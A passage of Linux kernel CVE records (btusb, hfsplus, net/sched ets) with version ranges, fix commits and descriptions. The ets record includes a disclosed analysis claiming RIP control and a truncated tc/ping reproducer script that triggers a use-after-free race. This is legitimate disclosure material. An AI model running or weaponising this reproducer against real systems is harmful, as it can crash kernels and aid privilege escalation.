"dateUpdated": "2026-01-14T08:51:43.137Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3a7cd1397c209076c371d53bf39a55c138f62342"
},
{
"url": "https://git.kernel.org/stable/c/cffc4e29b1e2d44ab094cf142d7c461ff09b9104"
},
{
"url": "https://git.kernel.org/stable/c/e58c88f0cb2d8ed89de78f6f17409d29cfab6c5c"
}
],
"title": "Input: lkkbd - disable pending work before freeing device",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71073",
"datePublished": "2026-01-13T15:31:26.771Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-14T08:51:43.137Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71082 (GCVE-0-2025-71082)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
Bluetooth: btusb: revert use of devm_kzalloc in btusb
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btusb: revert use of devm_kzalloc in btusb
This reverts commit 98921dbd00c4e ("Bluetooth: Use devm_kzalloc in
btusb.c file").
In btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This
ties the lifetime of all the btusb data to the binding of a driver to
one interface, INTF. In a driver that binds to other interfaces, ISOC
and DIAG, this is an accident waiting to happen.
The issue is revealed in btusb_disconnect(), where calling
usb_driver_release_interface(&btusb_driver, data->intf) will have devm
free the data that is also being used by the other interfaces of the
driver that may not be released yet.
To fix this, revert the use of devm and go back to freeing memory
explicitly.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
98921dbd00c4e2e4bdd56423cb5edf98d57b45f7 , < fff9206b0907252a41eb12b7c1407b9347df18b1
(git)
Affected: 98921dbd00c4e2e4bdd56423cb5edf98d57b45f7 , < cca0e9206e3bcc63cd3e72193e60149165d493cc (git) Affected: 98921dbd00c4e2e4bdd56423cb5edf98d57b45f7 , < c0ecb3e4451fe94f4315e6d09c4046dfbc42090b (git) Affected: 98921dbd00c4e2e4bdd56423cb5edf98d57b45f7 , < 1e54c19eaf84ba652c4e376571093e58e144b339 (git) Affected: 98921dbd00c4e2e4bdd56423cb5edf98d57b45f7 , < fdf7c640fb8a44a59b0671143d8c2f738bc48003 (git) Affected: 98921dbd00c4e2e4bdd56423cb5edf98d57b45f7 , < 252714f1e8bdd542025b16321c790458014d6880 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/bluetooth/btusb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fff9206b0907252a41eb12b7c1407b9347df18b1",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
},
{
"lessThan": "cca0e9206e3bcc63cd3e72193e60149165d493cc",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
},
{
"lessThan": "c0ecb3e4451fe94f4315e6d09c4046dfbc42090b",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
},
{
"lessThan": "1e54c19eaf84ba652c4e376571093e58e144b339",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
},
{
"lessThan": "fdf7c640fb8a44a59b0671143d8c2f738bc48003",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
},
{
"lessThan": "252714f1e8bdd542025b16321c790458014d6880",
"status": "affected",
"version": "98921dbd00c4e2e4bdd56423cb5edf98d57b45f7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/bluetooth/btusb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:44.188Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fff9206b0907252a41eb12b7c1407b9347df18b1"
},
{
"url": "https://git.kernel.org/stable/c/cca0e9206e3bcc63cd3e72193e60149165d493cc"
},
{
"url": "https://git.kernel.org/stable/c/c0ecb3e4451fe94f4315e6d09c4046dfbc42090b"
},
{
"url": "https://git.kernel.org/stable/c/1e54c19eaf84ba652c4e376571093e58e144b339"
},
{
"url": "https://git.kernel.org/stable/c/fdf7c640fb8a44a59b0671143d8c2f738bc48003"
},
{
"url": "https://git.kernel.org/stable/c/252714f1e8bdd542025b16321c790458014d6880"
}
],
"title": "Bluetooth: btusb: revert use of devm_kzalloc in btusb",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71082",
"datePublished": "2026-01-13T15:34:46.301Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:44.188Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68774 (GCVE-0-2025-68774)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
VLAI?
EPSS
Title
hfsplus: fix missing hfs_bnode_get() in __hfs_bnode_create
Summary
In the Linux kernel, the following vulnerability has been resolved:
hfsplus: fix missing hfs_bnode_get() in __hfs_bnode_create
When sync() and link() are called concurrently, both threads may
enter hfs_bnode_find() without finding the node in the hash table
and proceed to create it.
Thread A:
hfsplus_write_inode()
-> hfsplus_write_system_inode()
-> hfs_btree_write()
-> hfs_bnode_find(tree, 0)
-> __hfs_bnode_create(tree, 0)
Thread B:
hfsplus_create_cat()
-> hfs_brec_insert()
-> hfs_bnode_split()
-> hfs_bmap_alloc()
-> hfs_bnode_find(tree, 0)
-> __hfs_bnode_create(tree, 0)
In this case, thread A creates the bnode, sets refcnt=1, and hashes it.
Thread B also tries to create the same bnode, notices it has already
been inserted, drops its own instance, and uses the hashed one without
getting the node.
```
node2 = hfs_bnode_findhash(tree, cnid);
if (!node2) { <- Thread A
hash = hfs_bnode_hash(cnid);
node->next_hash = tree->node_hash[hash];
tree->node_hash[hash] = node;
tree->node_hash_cnt++;
} else { <- Thread B
spin_unlock(&tree->hash_lock);
kfree(node);
wait_event(node2->lock_wq,
!test_bit(HFS_BNODE_NEW, &node2->flags));
return node2;
}
```
However, hfs_bnode_find() requires each call to take a reference.
Here both threads end up setting refcnt=1. When they later put the node,
this triggers:
BUG_ON(!atomic_read(&node->refcnt))
In this scenario, Thread B in fact finds the node in the hash table
rather than creating a new one, and thus must take a reference.
Fix this by calling hfs_bnode_get() when reusing a bnode newly created by
another thread to ensure the refcount is updated correctly.
A similar bug was fixed in HFS long ago in commit
a9dc087fd3c4 ("fix missing hfs_bnode_get() in __hfs_bnode_create")
but the same issue remained in HFS+ until now.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 3b0fc7af50b896d0f3d104e70787ba1973bc0b56
(git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 39e149d58ef4d7883cbf87448d39d51292fd342d (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < b68dc4134b18a3922cd33439ec614aad4172bc86 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < b9d1c6bb5f19460074ce9862cb80be86b5fb0a50 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 457f795e7abd7770de10216d7f9994a3f12a56d6 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 5882e7c8cdbb5e254a69628b780acff89c78071e (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 152af114287851583cf7e0abc10129941f19466a (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/hfsplus/bnode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3b0fc7af50b896d0f3d104e70787ba1973bc0b56",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "39e149d58ef4d7883cbf87448d39d51292fd342d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b68dc4134b18a3922cd33439ec614aad4172bc86",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b9d1c6bb5f19460074ce9862cb80be86b5fb0a50",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "457f795e7abd7770de10216d7f9994a3f12a56d6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5882e7c8cdbb5e254a69628b780acff89c78071e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "152af114287851583cf7e0abc10129941f19466a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/hfsplus/bnode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfsplus: fix missing hfs_bnode_get() in __hfs_bnode_create\n\nWhen sync() and link() are called concurrently, both threads may\nenter hfs_bnode_find() without finding the node in the hash table\nand proceed to create it.\n\nThread A:\n hfsplus_write_inode()\n -\u003e hfsplus_write_system_inode()\n -\u003e hfs_btree_write()\n -\u003e hfs_bnode_find(tree, 0)\n -\u003e __hfs_bnode_create(tree, 0)\n\nThread B:\n hfsplus_create_cat()\n -\u003e hfs_brec_insert()\n -\u003e hfs_bnode_split()\n -\u003e hfs_bmap_alloc()\n -\u003e hfs_bnode_find(tree, 0)\n -\u003e __hfs_bnode_create(tree, 0)\n\nIn this case, thread A creates the bnode, sets refcnt=1, and hashes it.\nThread B also tries to create the same bnode, notices it has already\nbeen inserted, drops its own instance, and uses the hashed one without\ngetting the node.\n\n```\n\n\tnode2 = hfs_bnode_findhash(tree, cnid);\n\tif (!node2) { \u003c- Thread A\n\t\thash = hfs_bnode_hash(cnid);\n\t\tnode-\u003enext_hash = tree-\u003enode_hash[hash];\n\t\ttree-\u003enode_hash[hash] = node;\n\t\ttree-\u003enode_hash_cnt++;\n\t} else { \u003c- Thread B\n\t\tspin_unlock(\u0026tree-\u003ehash_lock);\n\t\tkfree(node);\n\t\twait_event(node2-\u003elock_wq,\n\t\t\t!test_bit(HFS_BNODE_NEW, \u0026node2-\u003eflags));\n\t\treturn node2;\n\t}\n```\n\nHowever, hfs_bnode_find() requires each call to take a reference.\nHere both threads end up setting refcnt=1. When they later put the node,\nthis triggers:\n\nBUG_ON(!atomic_read(\u0026node-\u003erefcnt))\n\nIn this scenario, Thread B in fact finds the node in the hash table\nrather than creating a new one, and thus must take a reference.\n\nFix this by calling hfs_bnode_get() when reusing a bnode newly created by\nanother thread to ensure the refcount is updated correctly.\n\nA similar bug was fixed in HFS long ago in commit\na9dc087fd3c4 (\"fix missing hfs_bnode_get() in __hfs_bnode_create\")\nbut the same issue remained in HFS+ until now."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:54.901Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3b0fc7af50b896d0f3d104e70787ba1973bc0b56"
},
{
"url": "https://git.kernel.org/stable/c/39e149d58ef4d7883cbf87448d39d51292fd342d"
},
{
"url": "https://git.kernel.org/stable/c/b68dc4134b18a3922cd33439ec614aad4172bc86"
},
{
"url": "https://git.kernel.org/stable/c/b9d1c6bb5f19460074ce9862cb80be86b5fb0a50"
},
{
"url": "https://git.kernel.org/stable/c/457f795e7abd7770de10216d7f9994a3f12a56d6"
},
{
"url": "https://git.kernel.org/stable/c/5882e7c8cdbb5e254a69628b780acff89c78071e"
},
{
"url": "https://git.kernel.org/stable/c/152af114287851583cf7e0abc10129941f19466a"
}
],
"title": "hfsplus: fix missing hfs_bnode_get() in __hfs_bnode_create",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68774",
"datePublished": "2026-01-13T15:28:51.379Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-19T12:18:54.901Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71066 (GCVE-0-2025-71066)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change
zdi-disclosures@trendmicro.com says:
The vulnerability is a race condition between `ets_qdisc_dequeue` and
`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.
Attacker requires the capability to create new user and network namespace
in order to trigger the bug.
See my additional commentary at the end of the analysis.
Analysis:
static int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,
struct netlink_ext_ack *extack)
{
...
// (1) this lock is preventing .change handler (`ets_qdisc_change`)
//to race with .dequeue handler (`ets_qdisc_dequeue`)
sch_tree_lock(sch);
for (i = nbands; i < oldbands; i++) {
if (i >= q->nstrict && q->classes[i].qdisc->q.qlen)
list_del_init(&q->classes[i].alist);
qdisc_purge_queue(q->classes[i].qdisc);
}
WRITE_ONCE(q->nbands, nbands);
for (i = nstrict; i < q->nstrict; i++) {
if (q->classes[i].qdisc->q.qlen) {
// (2) the class is added to the q->active
list_add_tail(&q->classes[i].alist, &q->active);
q->classes[i].deficit = quanta[i];
}
}
WRITE_ONCE(q->nstrict, nstrict);
memcpy(q->prio2band, priomap, sizeof(priomap));
for (i = 0; i < q->nbands; i++)
WRITE_ONCE(q->classes[i].quantum, quanta[i]);
for (i = oldbands; i < q->nbands; i++) {
q->classes[i].qdisc = queues[i];
if (q->classes[i].qdisc != &noop_qdisc)
qdisc_hash_add(q->classes[i].qdisc, true);
}
// (3) the qdisc is unlocked, now dequeue can be called in parallel
// to the rest of .change handler
sch_tree_unlock(sch);
ets_offload_change(sch);
for (i = q->nbands; i < oldbands; i++) {
// (4) we're reducing the refcount for our class's qdisc and
// freeing it
qdisc_put(q->classes[i].qdisc);
// (5) If we call .dequeue between (4) and (5), we will have
// a strong UAF and we can control RIP
q->classes[i].qdisc = NULL;
WRITE_ONCE(q->classes[i].quantum, 0);
q->classes[i].deficit = 0;
gnet_stats_basic_sync_init(&q->classes[i].bstats);
memset(&q->classes[i].qstats, 0, sizeof(q->classes[i].qstats));
}
return 0;
}
Comment:
This happens because some of the classes have their qdiscs assigned to
NULL, but remain in the active list. This commit fixes this issue by always
removing the class from the active list before deleting and freeing its
associated qdisc
Reproducer Steps
(trimmed version of what was sent by zdi-disclosures@trendmicro.com)
```
DEV="${DEV:-lo}"
ROOT_HANDLE="${ROOT_HANDLE:-1:}"
BAND2_HANDLE="${BAND2_HANDLE:-20:}" # child under 1:2
PING_BYTES="${PING_BYTES:-48}"
PING_COUNT="${PING_COUNT:-200000}"
PING_DST="${PING_DST:-127.0.0.1}"
SLOW_TBF_RATE="${SLOW_TBF_RATE:-8bit}"
SLOW_TBF_BURST="${SLOW_TBF_BURST:-100b}"
SLOW_TBF_LAT="${SLOW_TBF_LAT:-1s}"
cleanup() {
tc qdisc del dev "$DEV" root 2>/dev/null
}
trap cleanup EXIT
ip link set "$DEV" up
tc qdisc del dev "$DEV" root 2>/dev/null || true
tc qdisc add dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2
tc qdisc add dev "$DEV" parent 1:2 handle "$BAND2_HANDLE" \
tbf rate "$SLOW_TBF_RATE" burst "$SLOW_TBF_BURST" latency "$SLOW_TBF_LAT"
tc filter add dev "$DEV" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2
tc -s qdisc ls dev $DEV
ping -I "$DEV" -f -c "$PING_COUNT" -s "$PING_BYTES" -W 0.001 "$PING_DST" \
>/dev/null 2>&1 &
tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 0
tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2
tc -s qdisc ls dev $DEV
tc qdisc del dev "$DEV" parent
---truncated---
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
ae2659d2c670252759ee9c823c4e039c0e05a6f2 , < 062d5d544e564473450d72e6af83077c2b2ff7c3
(git)
Affected: e25bdbc7e951ae5728fee1f4c09485df113d013c , < c7f6e7cc14df72b997258216e99d897d2df0dbbd (git) Affected: de6d25924c2a8c2988c6a385990cafbe742061bf , < a75d617a4ef08682f5cfaadc01d5141c87e019c9 (git) Affected: de6d25924c2a8c2988c6a385990cafbe742061bf , < 9987cda315c08f63a02423fa2f9a1f6602c861a0 (git) Affected: de6d25924c2a8c2988c6a385990cafbe742061bf , < 06bfb66a7c8b45e3fed01351a4b087410ae5ef39 (git) Affected: de6d25924c2a8c2988c6a385990cafbe742061bf , < 45466141da3c98a0c5fa88be0bc14b4b6a4bd75c (git) Affected: de6d25924c2a8c2988c6a385990cafbe742061bf , < ce052b9402e461a9aded599f5b47e76bc727f7de (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sched/sch_ets.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "062d5d544e564473450d72e6af83077c2b2ff7c3",
"status": "affected",
"version": "ae2659d2c670252759ee9c823c4e039c0e05a6f2",
"versionType": "git"
},
{
"lessThan": "c7f6e7cc14df72b997258216e99d897d2df0dbbd",
"status": "affected",
"version": "e25bdbc7e951ae5728fee1f4c09485df113d013c",
"versionType": "git"
},
{
"lessThan": "a75d617a4ef08682f5cfaadc01d5141c87e019c9",
"status": "affected",
"version": "de6d25924c2a8c2988c6a385990cafbe742061bf",
"versionType": "git"
},
{
"lessThan": "9987cda315c08f63a02423fa2f9a1f6602c861a0",
"status": "affected",
"version": "de6d25924c2a8c2988c6a385990cafbe742061bf",
"versionType": "git"
},
{
"lessThan": "06bfb66a7c8b45e3fed01351a4b087410ae5ef39",
"status": "affected",
"version": "de6d25924c2a8c2988c6a385990cafbe742061bf",
"versionType": "git"
},
{
"lessThan": "45466141da3c98a0c5fa88be0bc14b4b6a4bd75c",
"status": "affected",
"version": "de6d25924c2a8c2988c6a385990cafbe742061bf",
"versionType": "git"
},
{
"lessThan": "ce052b9402e461a9aded599f5b47e76bc727f7de",
"status": "affected",
"version": "de6d25924c2a8c2988c6a385990cafbe742061bf",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sched/sch_ets.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, 